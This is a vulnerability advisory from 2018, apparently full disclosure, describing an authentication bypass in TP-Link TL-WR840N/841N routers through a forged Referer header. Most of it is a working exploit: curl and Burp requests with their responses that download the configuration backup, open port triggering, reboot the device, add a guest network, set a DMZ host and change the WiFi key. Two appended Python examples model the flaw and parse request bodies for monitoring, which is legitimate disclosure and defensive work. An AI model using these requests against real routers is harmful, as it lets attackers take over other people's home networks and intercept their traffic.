Title: TP-Link Multiple Router (TL-WR840N and TL-WR841N) Unauthenticated Router Access Vulnerability
Author: BlackFog Team
Date: 27 May 2018
Website: SecureLayer7.net
Contact: info@securelayer7.net

Version:
Firmware Version: 0.9.1 4.16 v0001.0 Build 170622 Rel.64334n
Hardware Version: TL-WR841N v13 00000013

Version:
Firmware Version: 0.9.1 3.16 v0001.0 Build 170608 Rel.58696n
Hardware Version: TL-WR840N v5 00000005

Vendor Description:
TP-Link is the world's #1 provider of consumer WiFi networking devices, shipping products to over 120 countries and hundreds of millions of customers. (source https://www.tp-link.com/)

Attack Description:
This issue is caused by improper session handling on the /cgi/ folder (or the /cgi file), found by Touhid Shaikh (BlackFog Team Member). If an attacker sends a Referer header with the request and sets it to Referer: http://192.168.0.1/mainFrame.htm, no authentication is required and the attacker can perform the router's actions without authentication. A few examples are shown below, but an attacker can perform almost every action on the router without authentication.
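The root cause described above is an authorization check keyed on a client-controlled header. The following Python model is an added example, not code from the advisory or from TP-Link's firmware: it shows the vulnerable pattern (trusting Referer as proof of login) next to a hardened check that requires a server-issued session and uses Referer/Origin only as a secondary CSRF defence on state-changing requests. The session store, request type and status mapping are assumptions for illustration; only the Referer value and the 403/200 outcomes come from the PoC.

```python
"""Added example (not from the advisory): models the authorization flaw the
advisory describes. The router grants access to /cgi paths when a
client-controlled Referer header matches its own main page; the hardened
version ignores Referer for authentication and requires a server-side session,
using Referer/Origin only as an extra CSRF check on non-GET requests.
All names and the session model are illustrative assumptions."""
import secrets
from dataclasses import dataclass, field

DEVICE_ORIGIN = "http://192.168.0.1"
MAINFRAME_REFERER = DEVICE_ORIGIN + "/mainFrame.htm"


@dataclass
class Request:
    method: str
    path: str
    headers: dict = field(default_factory=dict)  # lower-case header names
    cookies: dict = field(default_factory=dict)


def authorize_by_referer(req: Request) -> bool:
    """Vulnerable pattern: the Referer header is chosen by the client, so this
    check admits anyone who copies the value from the advisory."""
    return req.headers.get("referer") == MAINFRAME_REFERER


class SessionStore:
    """Minimal server-side session table: only tokens minted by create() are valid."""

    def __init__(self) -> None:
        self._tokens: set = set()

    def create(self) -> str:
        token = secrets.token_urlsafe(32)
        self._tokens.add(token)
        return token

    def valid(self, token: str) -> bool:
        # constant-time comparison against each stored token
        return any(secrets.compare_digest(token, t) for t in self._tokens)


def authorize_hardened(req: Request, store: SessionStore) -> bool:
    """Authentication comes from a session the server issued; Referer/Origin is
    checked only as an additional CSRF defence for state-changing requests."""
    token = req.cookies.get("session")
    if not token or not store.valid(token):
        return False
    if req.method != "GET":
        src = req.headers.get("origin") or req.headers.get("referer") or ""
        if not (src == DEVICE_ORIGIN or src.startswith(DEVICE_ORIGIN + "/")):
            return False
    return True


def handle(req: Request, authorized: bool) -> int:
    """Maps the authorization decision to the status codes seen in the PoC."""
    if not req.path.startswith("/cgi"):
        return 200
    return 200 if authorized else 403


def replay_advisory_requests() -> dict:
    """Constructed requests mirroring the two curl attempts in the PoC,
    evaluated under both checks. Returns the status code per case."""
    store = SessionStore()
    no_ref = Request("GET", "/cgi/conf.bin")
    forged_ref = Request("GET", "/cgi/conf.bin", {"referer": MAINFRAME_REFERER})
    logged_in = Request("GET", "/cgi/conf.bin", {"referer": MAINFRAME_REFERER},
                        {"session": store.create()})
    return {
        "vulnerable_no_referer": handle(no_ref, authorize_by_referer(no_ref)),
        "vulnerable_forged_referer": handle(forged_ref, authorize_by_referer(forged_ref)),
        "hardened_forged_referer": handle(forged_ref, authorize_hardened(forged_ref, store)),
        "hardened_logged_in": handle(logged_in, authorize_hardened(logged_in, store)),
    }


if __name__ == "__main__":
    for name, status in replay_advisory_requests().items():
        print(f"{name}: {status}")
```

The point of the hardened version is the order of checks: the session decides whether the caller is authenticated at all, and only then does the Referer/Origin comparison run, and only to reject cross-site POSTs. A Referer check on its own is a weak CSRF mitigation and was never a substitute for a session.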
NOTE: Except the admin password change, because that requires the current password.

##### POC ######

----------------------- Fail attempt -------------------------

root@linux:/workspace# curl -i -s -k -X GET http://192.168.0.1/cgi/conf.bin
HTTP/1.1 403 Forbidden
Content-Type: text/html; charset=utf-8
Content-Length: 106
Connection: close

<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

-----------------------------------------------------

--------------- Successful attempt --------------------------------

root@linux:/workspace# curl -i -s -k -X GET -H "Referer: http://192.168.0.1/mainFrame.htm" http://192.168.0.1/cgi/conf.bin
HTTP/1.1 200 OK
Content-Type: application/octet-stream; charset=utf-8
Content-Length: 5984
Connection: keep-alive

root@linux:/workspace# curl -s -k -X GET -H "Referer: http://192.168.0.1/mainFrame.htm" http://192.168.0.1/cgi/conf.bin > backup.bin
root@linux:/workspace# file backup.bin
backup.bin: data
root@linux:/workspace# ls -la backup.bin
-rw-r--r-- 1 root root 5720 Mar 30 17:17 backup.bin

----------------------------------------------------

##### POC END ######

Evil Actions Without Authentication example.

============== Burp Request and curl command for conf.bin or backup file =================

####### Burp ########

GET /cgi/conf.bin HTTP/1.1
Host: 192.168.0.1
User-Agent: Agent22
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/mainFrame.htm
Connection: close
Upgrade-Insecure-Requests: 1

-------Response--------

HTTP/1.1 200 OK
Content-Type: application/octet-stream; charset=utf-8
Content-Length: 5720
Connection: close

w@\ÝÓb êLýªïÀ‡ÉE‹ûaɬ,*-àh[Ú‹³lÙ€ÍÁ.©-
.....SKIP.......

######## Curl ##########

curl -i -s -k -X $'GET' -H $'Host: 192.168.0.1' -H $'User-Agent: Agent22' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: http://192.168.0.1/mainFrame.htm' -H $'Connection: close' $'http://192.168.0.1/cgi/conf.bin' > backup.bin

------ take a look in backup.bin file --------

===========================================

=========== Add Port Forwarding ============

curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent: Mozilla/Agent22" -H 'Accept: */*' -H "Referer: http://192.168.0.1/mainFrame.htm" --data-binary $'[IP_CONN_PORTTRIGGERING#0,0,0,0,0,0#1,1,2,0,0,0]0,5\x0d\x0atriggerPort=23\x0d\x0atriggerProtocol=TCP or UDP\x0d\x0aopenProtocol=TCP or UDP\x0d\x0aenable=1\x0d\x0aopenPort=23\x0d\x0a' http://192.168.0.1/cgi?3

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive

[1,1,2,7,0,0]0
triggerPort=23
triggerProtocol=TCP or UDP
openProtocol=TCP or UDP
enable=1
openPort=23
[error]0

----- Description -----
enable=0 disables the rule, enable=1 enables it. The port can be changed as well.
====================================

=========== Reboot Router =========================

curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent: Mozilla/Agent22" -H 'Accept: */*' -H "Referer: http://192.168.0.1/mainFrame.htm" --data-binary $'[ACT_REBOOT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\x0d\x0a' http://192.168.0.1/cgi?7

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive

[error]0

---- Description -----
error = 0 means the reboot succeeded.

======================================

============= Enable Guest Network ==========================

curl -i -s -k -X $'POST' -H $'Host: 192.168.0.1' -H $'User-Agent: Aent22' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: text/plain' -H $'Referer: http://192.168.0.1/mainFrame.htm' -H $'Content-Length: 844' -H $'Connection: close' --data-binary $'[LAN_WLAN_MULTISSID#1,1,0,0,0,0#0,0,0,0,0,0]0,1\x0d\x0amultiSSIDEnable=1\x0d\x0a[LAN_WLAN_MSSIDENTRY#1,1,1,0,0,0#0,0,0,0,0,0]1,11\x0d\x0aIsolateClients=0\x0d\x0aEnable=1\x0d\x0aSSID=Agent22\x0d\x0aBeaconType=WPAand11i\x0d\x0aWPAAuthenticationMode=PSKAuthentication\x0d\x0aWPAEncryptionModes=TKIPandAESEncryption\x0d\x0aIEEE11iAuthenticationMode=PSKAuthentication\x0d\x0aIEEE11iEncryptionModes=TKIPandAESEncryption\x0d\x0aPreSharedKey=9876543210\x0d\x0aGroupKeyUpdateInterval=0\x0d\x0aMaxStaNum=32\x0d\x0a[LAN_WLAN_MSSIDENTRY#1,2,1,0,0,0#0,0,0,0,0,0]2,1\x0d\x0aIsolateClients=0\x0d\x0a[LAN_WLAN_GUESTNET#1,1,0,0,0,0#0,0,0,0,0,0]3,8\x0d\x0aLANAccessEnable=1\x0d\x0aUSBAccessEnable=0\x0d\x0aTCEnable=0\x0d\x0aTCMinUpBW=100\x0d\x0aTCMaxUpBW=200\x0d\x0aTCMinDownBW=100\x0d\x0aTCMaxDownBW=200\x0d\x0alastModified=1\x0d\x0a[LAN_WLAN_GUESTNET#1,2,0,0,0,0#0,0,0,0,0,0]4,8\x0d\x0aLANAccessEnable=1\x0d\x0aUSBAccessEnable=0\x0d\x0aTCEnable=0\x0d\x0aTCMinUpBW=100\x0d\x0aTCMaxUpBW=200\x0d\x0aTCMinDownBW=100\x0d\x0aTCMaxDownBW=200\x0d\x0alastModified=0\x0d\x0a' $'http://192.168.0.1/cgi?2&2&2&2&2'

------- Description ----------
SSID=Agent22
PreSharedKey=9876543210

=============================================

======= DMZ enable and Disable on 192.168.0.112 ===========

curl -i -s -k -X $'POST' -H $'Host: 192.168.0.1' -H $'User-Agent: Agent22' -H $'Referer: http://192.168.0.1/mainFrame.htm' -H $'Content-Length: 78' -H $'Connection: close' --data-binary $'[DMZ_HOST_CFG#0,0,0,0,0,0#0,0,0,0,0,0]0,2\x0d\x0aenable=1\x0d\x0aIPAddress=192.168.0.112\x0d\x0a' $'http://192.168.0.1/cgi?2'

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close

[error]0

-------Description -----------
IPAddress=192.168.0.112
enable=1 or 0 (enable or disable)

=================================================

=============== WiFi Password Change =============

curl -i -s -k -X $'POST' -H $'Host: 192.168.0.1' -H $'User-Agent: Agent22' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: text/plain' -H $'Referer: http://192.168.0.1/mainFrame.htm' -H $'Content-Length: 199' -H $'Connection: close' --data-binary $'[LAN_WLAN#1,1,0,0,0,0#0,0,0,0,0,0]0,5\x0d\x0aBeaconType=11i\x0d\x0aIEEE11iAuthenticationMode=PSKAuthentication\x0d\x0aIEEE11iEncryptionModes=AESEncryption\x0d\x0aX_TP_PreSharedKey=9876543210\x0d\x0aX_TP_GroupKeyUpdateInterval=0\x0d\x0a' $'http://192.168.0.1/cgi?2'

-------Description -----------
IEEE11iAuthenticationMode=PSKAuthentication
IEEE11iEncryptionModes=AESEncryption
X_TP_PreSharedKey=9876543210

===============================

======= Report Timeline =============

30 Mar, 2018 ----- Initial Report (support.in@tp-link.com) (No Response)
27 May, 2018 ----- Full Disclosure
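The request and response bodies in this advisory (port forwarding, reboot, guest network, DMZ, WiFi password) all use the same stanza format: a header `[SECTION#sel1#sel2]index,count` followed by `count` lines of `key=value`, each terminated by CRLF, and responses end with `[error]N`. For anyone reviewing a proxy log or packet capture from one of these routers, it helps to decode that format and see which configuration a request would change. The parser below is an added example written for this page, not code from the advisory or from TP-Link; the stanza grammar is inferred from the bodies shown here, the list of sensitive sections is an assumption drawn from the advisory's own examples, and the sample bodies are constructed copies of those examples.

```python
"""Added example (not from the advisory): parse the stanza-based body format the
router's /cgi endpoint accepts and returns, and flag which stanzas touch
configuration the advisory shows being changed without authentication.
The grammar is inferred from the bodies in the advisory; SENSITIVE_SECTIONS is
an assumption for illustration."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# [SECTION#a,b,c,d,e,f#g,h,i,j,k,l]index,count  (selectors and count are optional,
# responses use the bare form [1,1,2,7,0,0]0 and the trailer [error]0)
STANZA_RE = re.compile(r"^\[([^\]#]+)(?:#([\d,]+)#([\d,]+))?\](\d+)(?:,(\d+))?$")

# Sections the advisory shows being modified over the unauthenticated path
SENSITIVE_SECTIONS = {
    "ACT_REBOOT": "reboot",
    "IP_CONN_PORTTRIGGERING": "port triggering",
    "DMZ_HOST_CFG": "DMZ host",
    "LAN_WLAN": "wireless security settings",
    "LAN_WLAN_MSSIDENTRY": "guest SSID",
    "LAN_WLAN_GUESTNET": "guest network access",
}


@dataclass
class Stanza:
    section: str
    selector: Optional[Tuple[str, str]]
    index: int
    values: dict = field(default_factory=dict)


def _take_kv(line: str, target: dict) -> None:
    key, sep, value = line.partition("=")
    if not sep:
        raise ValueError(f"expected key=value, got {line!r}")
    target[key] = value


def parse_body(body: str) -> List[Stanza]:
    """Parse a request or response body into stanzas. A header with an explicit
    count consumes exactly that many key=value lines; a header without one
    (response form) consumes key=value lines up to the next header."""
    lines = body.replace("\r\n", "\n").split("\n")
    stanzas: List[Stanza] = []
    i = 0
    while i < len(lines):
        line = lines[i]
        i += 1
        if not line:
            continue
        m = STANZA_RE.match(line)
        if not m:
            raise ValueError(f"malformed stanza header: {line!r}")
        section, sel1, sel2, idx, count = m.groups()
        st = Stanza(section, (sel1, sel2) if sel1 else None, int(idx))
        if count is not None:
            for _ in range(int(count)):
                if i >= len(lines) or not lines[i]:
                    raise ValueError(f"truncated stanza {section}")
                _take_kv(lines[i], st.values)
                i += 1
        else:
            while i < len(lines) and lines[i] and not lines[i].startswith("["):
                _take_kv(lines[i], st.values)
                i += 1
        stanzas.append(st)
    return stanzas


def response_error_code(body: str) -> Optional[int]:
    """Return N from the trailing [error]N stanza, or None if absent."""
    codes = [s.index for s in parse_body(body) if s.section == "error"]
    return codes[-1] if codes else None


def flag_sensitive(body: str) -> List[Tuple[str, str]]:
    """List (section, description) for every stanza that changes sensitive config."""
    return [(s.section, SENSITIVE_SECTIONS[s.section])
            for s in parse_body(body) if s.section in SENSITIVE_SECTIONS]


# Constructed samples copied from the advisory's port-triggering exchange
SAMPLE_REQUEST = ("[IP_CONN_PORTTRIGGERING#0,0,0,0,0,0#1,1,2,0,0,0]0,5\r\n"
                  "triggerPort=23\r\ntriggerProtocol=TCP or UDP\r\n"
                  "openProtocol=TCP or UDP\r\nenable=1\r\nopenPort=23\r\n")
SAMPLE_RESPONSE = ("[1,1,2,7,0,0]0\r\ntriggerPort=23\r\ntriggerProtocol=TCP or UDP\r\n"
                   "openProtocol=TCP or UDP\r\nenable=1\r\nopenPort=23\r\n[error]0\r\n")

if __name__ == "__main__":
    for s in parse_body(SAMPLE_REQUEST):
        print(s.section, s.selector, s.index, s.values)
    print("flagged:", flag_sensitive(SAMPLE_REQUEST))
    print("error code:", response_error_code(SAMPLE_RESPONSE))
```

The error stanza is the only reliable success signal in these responses, so `response_error_code` is what a monitoring rule would key on when correlating an unauthenticated POST to `/cgi?N` with a configuration change that actually took effect.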